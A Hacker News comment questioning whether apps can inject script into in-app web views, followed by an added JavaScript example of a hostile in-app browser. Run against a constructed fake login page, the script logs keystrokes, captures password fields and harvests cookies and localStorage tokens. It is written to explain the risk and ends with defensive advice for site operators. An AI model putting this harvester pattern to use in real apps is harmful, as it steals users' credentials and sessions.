Comment by armchairhacker
4 years ago
Can they really though?
I mean, this is literally XSS. And it's not just Facebook and TikTok, unless this is a private API scummy apps can and (I guarantee) are doing this to steal user passwords and bank credentials. Your average person already needs to know that they can't type in their credentials unless the URL says facebook.com, now they also need to check the app is Safari. And you may not even need to enter credentials, a malicious app could just load my-bank.com and extract the cookies or local storage or send API requests.
If true...wow. That's a massive security oversight. But it seems too massive; I'm not 100% convinced. Especially because websites are tightly sandboxed from other websites and apps are tightly sandboxed from other apps. Yeah you could in theory re-implement your own web browser in your app which looks and acts like Safari, but in practice Apple technically forbids other web-views, and it's really hard to fully implement a web browser and not make it immediately apparent anyway.
Contribute on Hacker News ↗
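To make the scenario in the comment concrete, here is an added example (not code from the thread, and not from Facebook, TikTok or Apple) of what a host app can do once it renders a third-party site in its own web view and runs JavaScript inside that page. On iOS the injection primitive would be a WKUserScript or evaluateJavaScript call; that API is not exercised here. The page, its cookies and storage, and the hostname my-bank.example are all constructed stand-ins, and the harvester returns what it collected instead of exfiltrating it.

```javascript
// Added example modelling a hostile in-app browser. Everything below runs
// offline against a constructed fake DOM; nothing touches a real site.

// Constructed stand-in for a login page's DOM and storage (assumption: it
// mirrors only the handful of browser APIs the harvester touches).
function makeFakePage() {
  const inputs = [
    { name: 'username', type: 'text', value: '', listeners: {} },
    { name: 'password', type: 'password', value: '', listeners: {} },
  ];
  for (const el of inputs) {
    el.addEventListener = (ev, fn) => { (el.listeners[ev] ||= []).push(fn); };
    el.fire = (ev, detail) => {
      for (const fn of el.listeners[ev] || []) fn({ ...detail, target: el });
    };
  }
  return {
    location: { hostname: 'my-bank.example' },
    // document.cookie only exposes cookies that lack HttpOnly. The host app's
    // own cookie store (WKHTTPCookieStore on iOS) is not bound by that flag,
    // so from the app's side this is a floor, not a ceiling.
    cookie: 'theme=dark; csrf=abc123',
    localStorage: { authToken: 'tok-constructed-123', lastLogin: '2022-08-18' },
    querySelectorAll: (sel) => (sel === 'input' ? inputs : []),
  };
}

// The script a hostile host app would inject before the user interacts.
// A real injection would hand `loot` to the native side through a script
// message handler, or POST it with fetch(); this one just returns it.
function injectHarvester(doc) {
  const loot = { host: doc.location.hostname, cookies: {}, storage: {}, keystrokes: [], fields: {} };
  for (const part of doc.cookie.split(';')) {
    const [k, v] = part.trim().split('=');
    if (k) loot.cookies[k] = v;
  }
  Object.assign(loot.storage, doc.localStorage);
  for (const el of doc.querySelectorAll('input')) {
    // Password fields get no special protection from an in-page listener.
    el.addEventListener('keydown', (e) => loot.keystrokes.push(`${el.name}:${e.key}`));
    el.addEventListener('change', (e) => { loot.fields[el.name] = e.target.value; });
  }
  return loot;
}

// Drive the fake page the way a user would: type into a field, then blur it.
function typeInto(el, text) {
  for (const ch of text) {
    el.fire('keydown', { key: ch });
    el.value += ch;
  }
  el.fire('change', {});
}

// End-to-end run: inject, then let the "user" log in. Returns the harvest.
function runScenario() {
  const doc = makeFakePage();
  const loot = injectHarvester(doc);
  const [user, pass] = doc.querySelectorAll('input');
  typeInto(user, 'alice');
  typeInto(pass, 'hunter2');
  return loot;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(runScenario(), null, 2));
}
```

The point of the run is that nothing in it is an exploit of the site: the page behaves normally, the URL bar (if the app even draws one) can say my-bank.example, and the user's only defence is the one the comment names, knowing which app is actually rendering the page. Site operators can limit the blast radius by keeping session cookies HttpOnly and out of localStorage, but that only removes the in-page copy; the app hosting the web view still holds every cookie the page receives.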